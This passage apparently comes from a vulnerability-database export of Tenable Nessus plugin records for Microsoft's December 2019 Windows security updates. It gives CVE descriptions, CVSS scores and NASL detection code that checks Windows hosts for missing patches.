view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4530702/windows-8-1-kb4530702\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/4530730/windows-8-1-kb4530730\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530730 or Cumulative Update KB4530702.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530702', '4530730');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530702, 4530730])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T10:36:54", "description": "The remote Windows host is missing security update 4530698\nor cumulative update 4530691. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530698: Windows Server 2012 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530691.NASL", "href": "https://www.tenable.com/plugins/nessus/131928", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131928);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530698\");\n script_xref(name:\"MSKB\", value:\"4530691\");\n script_xref(name:\"MSFT\", value:\"MS19-4530698\");\n script_xref(name:\"MSFT\", value:\"MS19-4530691\");\n\n script_name(english:\"KB4530698: Windows Server 2012 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530698\nor cumulative update 4530691. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530698/windows-server-2012-update-kb4530698\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41f8c8b1\");\n # https://support.microsoft.com/en-us/help/4530691/windows-server-2012-update-kb4530691\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c69ab12f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530698 or Cumulative Update KB4530691.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530698', '4530691');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win8:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.2\",\n sp:0,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530698, 4530691])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T10:36:54", "description": "The remote Windows host is missing security update 4530719\nor cumulative update 4530695. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530719: Windows Server 2008 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1478", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530695.NASL", "href": "https://www.tenable.com/plugins/nessus/131929", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131929);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1478\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530719\");\n script_xref(name:\"MSKB\", value:\"4530695\");\n script_xref(name:\"MSFT\", value:\"MS19-4530719\");\n script_xref(name:\"MSFT\", value:\"MS19-4530695\");\n\n script_name(english:\"KB4530719: Windows Server 2008 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530719\nor cumulative update 4530695. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530719/windows-server-2008-update-kb4530719\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a0050734\");\n # https://support.microsoft.com/en-us/help/4530695/windows-server-2008-update-kb4530695\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4b9efd1a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530719 or Cumulative Update KB4530695.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530695', '4530719');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.0\",\n sp:2,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530695, 4530719])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T10:36:55", "description": "The remote Windows host is missing security update 4530692\nor cumulative update 4530734. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530692: Windows 7 and Windows Server 2008 R2 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1478", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530734.NASL", "href": "https://www.tenable.com/plugins/nessus/131934", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131934);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1474\",\n \"CVE-2019-1478\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530734\");\n script_xref(name:\"MSKB\", value:\"4530692\");\n script_xref(name:\"MSFT\", value:\"MS19-4530734\");\n script_xref(name:\"MSFT\", value:\"MS19-4530692\");\n script_xref(name:\"IAVA\", value:\"2019-A-0450\");\n\n script_name(english:\"KB4530692: Windows 7 and Windows Server 2008 R2 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530692\nor cumulative update 4530734. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. 